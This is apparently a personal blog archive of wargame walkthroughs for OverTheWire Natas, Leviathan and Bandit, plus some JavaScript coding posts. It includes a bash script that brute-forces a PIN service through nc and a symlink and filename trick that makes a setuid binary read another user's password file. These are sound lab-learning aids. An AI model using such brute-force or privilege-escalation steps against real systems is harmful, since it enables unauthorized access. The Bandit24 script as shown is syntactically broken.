Showing posts from May, 2018

OverTheWire[.com] Natas Walkthrough - JUST HINT, NO SPOILERS

game portal:
PASSWORDS for each level are stored in /etc/natas_webpass/natasX

I made this walkthrough for people like me, i needed some help, but didnt want the spoiler, so here i will give you all the information needed to pass each level, yet not the solution.

For levels needed custom web request i made a different post for powershell and javascript with how-to's, since is a piece of learning for itself, and also for those of us that play at work and have only powershell at their hands. Although its not a complete spoiler there, its quite most of the solution so try yourself 1st.

The Natas game is from basic to advances web hacking. Every few levels is about whole new exploitation (with some harder ones doing comeback later), so a lot of learning.

If you're new, you're the reason i am writing so much even for the 1st level, just please google EVERY topic you see, since in the following levels i assume you know the previous topi…

Natas Powershell and JavaScript Helper (OverTheWire)

I did most of Natas from work, and there i couldn't have anything but Windows PowerShell, or the browser's console for Javascript, so here are examples how to use it for the game for anyone in the same position.


even though i tried not to have this a the solutions, its kinda the solution.

Level 4: HTTP Headers

# basics for working with .Net WebClient# create a variable with a value$u=""# creating new Object you need to specify the full namespaces and classes route$wc=New-ObjectSystem.Net.WebClient# this is how you send user and pass $c=New-ObjectSystem.Net.NetworkCredential("natas4","............")$wc.Credentials=$c# adding headers.# # adding a cookie is just "cookie", "name=value".$wc.Headers.Add("header-name","header-value")# download the same html you see in "view-source".# you can also more elegantly store this in a variable and print it lik# …

Javascript Event Oriented Programming example on SPSocialFeed

SPSocialFeed is the sharepoint microblog, where you can post your thoughts and reply on yourself and other.

We wanted to add some functionalities for every reply and post added, so i used the new "MutationObserver" and "CustomEvent" new API's in ES6 to create an event-full way to implement solution
// batman is the man in-charge catching the bad guys in the night.// so now he catches the good events in the feedletbatman=(function(){letconfig={childList:true};letbatman=classbatman{constructor(){this.v="2.0.0";//register call to batCave fn. to _spBodyOnLoadFunctionNames, the SP onready_spBodyOnLoadFunctionNames.push('batman.batCave');}batCave(){letfeed=document.getElementById('ms-feedthreadsdiv');//childNodes can be any type of nodes, like text node. children is only HTMLElements childNodes.letposts=feed.children;letevt=newCustomEvent('feedReady',{detail:{feed:feed,posts:posts}});console.log('batman fire feedReady event');…

Javascript Expost Interface Implementation

For some time i've been thinking, how can i export a JS object that will expose only public functions, yet will keep all my million functions "hidden" just to make it less messy..

The point is to create an anonymous function and create the instance within, while returning a new object with members pointing at the instance functions with ".bind" to the instance.

So here it is
letencapsulated=(functionencapsulated_builder(){letencapsulated=classencapsulated{constructor(){'bamba';this.animal='lion';}addFood(f){' '+f;}addFoodByAnimal(a){switch(a){case'dog':this.addFood('bone');break;case'cat':this.addFood('fish');break;}}addAnimal(a){this.animal+=' '+a;this.addFoodByAnimal(a);}printFood(){console.log(;}printAnimal(){console.log(this.animal);}}letenc_instance=newencapsulated();return{addAnimal:enc_instance.addAnimal.bind(enc_instance),printFood:enc_instance.printFood.bind(e…

OverTheWire[.com] Leviathan Walkthrough - JUST HINT, NO SPOILERS

game portal:
PASSWORDS for each level are stored in /etc/leviathan_pass/leviathanX

The Leviathan game is about basic debug/hack/trace binary files in linux, and how to exploit them.
The main tool you will be using here is ltrace, so read & google about it. Use it in ALL levels except Level 0, even if i don't mention it.

Another important note is that most of the files have the "s" flag in their permissions, meaning they run in elevated privileges, and that's important to understand the solutions. Go read about that too.

Level 0: Bookmarks

bookmarks.html is the file chrome creates when you export all your bookmarks, people can save sensitive info there.

Level 1: Introduction to "ltrace"

Time to use "ltrace".

Level 2: Exploiting "cat"

Most of the tutorials out there are out of date, exploiting symbolic links, and exploit "cat".
You can still exploit "cat", but it won&#…

OverTheWire[.com] Bandit Walkthrough - JUST HINT, NO SPOILERS

overthewire bandit walkthrough - JUST HINT, NO SPOILERS, just all the hints you need.

I made this walkthrough for people like me, i needed some help here and there, but didnt want the spoiler, and even some blogs like (mentioned with appreciation) that have the solution collapsed, there is no help if i dont know what to do, just need some pointers.

so lets go
game portal is

The bandit  game is mostly introduction to ssh, bash shell and their tricks

Pre Level 0: Connect to SSH

If you use linux, your command is "ssh" and thats it.
For windows you'll need to download a software, it's in the Level 0 hints (wikihow)
eventually you need to learn more about the ssh command, but the basic is that connection is defined as "ssh <user>@<domain> -p <port>"
CTRL+C to break process, CTRL+D to exit from current user's shell
I wrote this one down since i couldn't find a nice pag…

OverTheWire Bandit24 script

rm out

p=`cat /etc/bandit_pass/bandit24`
echo $p

echo "0-999"

until [ $i == 1000 ]
  until [ ${#n} == 4 ]

  echo "$p $n"
  res=$(echo -n "$p $n" | nc localhost 30002) >> out
  echo "res: $ln $res"

  if [[ $res =~ .*Correct.* ]]
    break n

until [ $i == 10000 ]
  echo "$p $i"
  res=$(echo -n "$p $i" | nc localhost 30002) >> out
  echo "res: $ln $res"

  if [[ $res =~ .*Correct.* ]]
    break n


leviathan level 2 overthewire - updated challenge

leviathan 2 overthewire setreuid(12002, 12002)

start by making a folder with our "mktemp -d", make a file, and ltrace ./printfile <your file>
most tutorials will show you how to get this done with a link file, which are good tutorials and test cases as they are, read them.

trying that...  INSIDE our tmp folder
ln -s /etc/leviathan_pass/leviathan3 /tmp/tmp.ydhTgRu2oq/b
ltrace ~/printfile /tmp/tmp.ydhTgRu2oq/a\ b
will output
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: Permission denied
this is because these 2 lines
setreuid(12002, 12002) 

but, i guess that was not the hack, and in the end we see that the final line executing is
anyway, like above or doing just a file named "a b" and another named "b" will output
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: No such file or directory

the important thing "cat" command did try to concat.

but to the real hack... make a folder in your tmp like th…